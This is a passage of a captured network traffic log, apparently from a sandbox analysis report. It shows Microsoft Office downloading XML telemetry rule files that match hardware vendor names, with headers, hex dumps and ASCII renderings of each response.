                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                ETag: "0x8DC582BA41997E3"
                                                                                                                                                                x-ms-request-id: b82db7f7-b01e-0053-188c-3acdf8000000
                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                x-azure-ref: 20241123T193648Z-174c587ffdf8fcgwhC1TEBnn7000000003n0000000001hb4
                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                2024-11-23 19:36:48 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                42192.168.2.44979813.107.246.63443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:48 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                2024-11-23 19:36:49 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:36:48 GMT
                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                Content-Length: 464
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                ETag: "0x8DC582B97FB6C3C"
                                                                                                                                                                x-ms-request-id: 9ffa30f7-401e-000a-3a5c-3d4a7b000000
                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                x-azure-ref: 20241123T193648Z-174c587ffdfcb7qhhC1TEB3x7000000003g0000000006wn0
                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                2024-11-23 19:36:49 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                43192.168.2.44979713.107.246.63443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:48 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                2024-11-23 19:36:49 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:36:49 GMT
                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                Content-Length: 477
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                ETag: "0x8DC582BB8CEAC16"
                                                                                                                                                                x-ms-request-id: 76a157b4-e01e-00aa-258c-3aceda000000
                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                x-azure-ref: 20241123T193649Z-174c587ffdfb5q56hC1TEB04kg000000038g00000000e638
                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                2024-11-23 19:36:49 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                44192.168.2.44979913.107.246.63443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:48 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                2024-11-23 19:36:49 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:36:49 GMT
                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                Content-Length: 494
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                ETag: "0x8DC582BB7010D66"
                                                                                                                                                                x-ms-request-id: 44e9982d-301e-001f-6639-3caa3a000000
                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                x-azure-ref: 20241123T193649Z-15b8b599d88tr2flhC1TEB5gk400000003f000000000bubd
                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                2024-11-23 19:36:49 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                45192.168.2.44980013.107.246.63443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:50 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                2024-11-23 19:36:51 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:36:50 GMT
                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                Content-Length: 419
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                                                                ETag: "0x8DC582B9748630E"
                                                                                                                                                                x-ms-request-id: 5931471e-001e-0046-7a23-3dda4b000000
                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                x-azure-ref: 20241123T193650Z-15b8b599d88wn9hhhC1TEBry0g00000003g000000000437b
                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                2024-11-23 19:36:51 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                46192.168.2.44980113.107.246.63443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:50 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                2024-11-23 19:36:51 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:36:51 GMT
                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                Content-Length: 472
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                ETag: "0x8DC582B9DACDF62"
                                                                                                                                                                x-ms-request-id: 14f5e79a-001e-0014-2864-3d5151000000
                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                x-azure-ref: 20241123T193651Z-15b8b599d88m7pn7hC1TEB4axw00000003c000000000e0kz
                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                2024-11-23 19:36:51 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                47192.168.2.44980213.107.246.63443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:50 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                2024-11-23 19:36:51 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:36:51 GMT
                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                Content-Length: 404
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                                                                ETag: "0x8DC582B9E8EE0F3"
                                                                                                                                                                x-ms-request-id: 4ec414f5-001e-0046-5fa0-3bda4b000000
                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                x-azure-ref: 20241123T193651Z-174c587ffdf8lw6dhC1TEBkgs800000003fg0000000004f6
                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                2024-11-23 19:36:51 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                48192.168.2.44980313.107.246.63443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:51 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                2024-11-23 19:36:51 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:36:51 GMT
                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                Content-Length: 468
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                ETag: "0x8DC582B9C8E04C8"
                                                                                                                                                                x-ms-request-id: 70a27cfa-201e-0051-248c-3a7340000000
                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                x-azure-ref: 20241123T193651Z-174c587ffdf7t49mhC1TEB4qbg00000003bg000000005490
                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                2024-11-23 19:36:51 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                49192.168.2.44980413.107.246.63443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:51 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                2024-11-23 19:36:51 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:36:51 GMT
                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                Content-Length: 428
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                ETag: "0x8DC582BAC4F34CA"
                                                                                                                                                                x-ms-request-id: a72cf994-301e-0099-6e45-3c6683000000
                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                x-azure-ref: 20241123T193651Z-15b8b599d88hr8sfhC1TEBbca4000000036g00000000ehh7
                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                2024-11-23 19:36:51 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                50192.168.2.44980513.107.246.63443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:52 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                2024-11-23 19:36:53 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:36:53 GMT
                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                Content-Length: 499
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                                                                ETag: "0x8DC582B98CEC9F6"
                                                                                                                                                                x-ms-request-id: be70ec4e-301e-000c-088c-3a323f000000
                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                x-azure-ref: 20241123T193653Z-174c587ffdfl22mzhC1TEBk40c00000003hg000000009aef
                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                2024-11-23 19:36:53 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                51192.168.2.44980713.107.246.63443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:52 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                2024-11-23 19:36:53 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:36:53 GMT
                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                Content-Length: 415
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                ETag: "0x8DC582B988EBD12"
                                                                                                                                                                x-ms-request-id: 87817176-601e-003e-034d-3c3248000000
                                                                                                                                                                x-ms-version: 2018-03-28
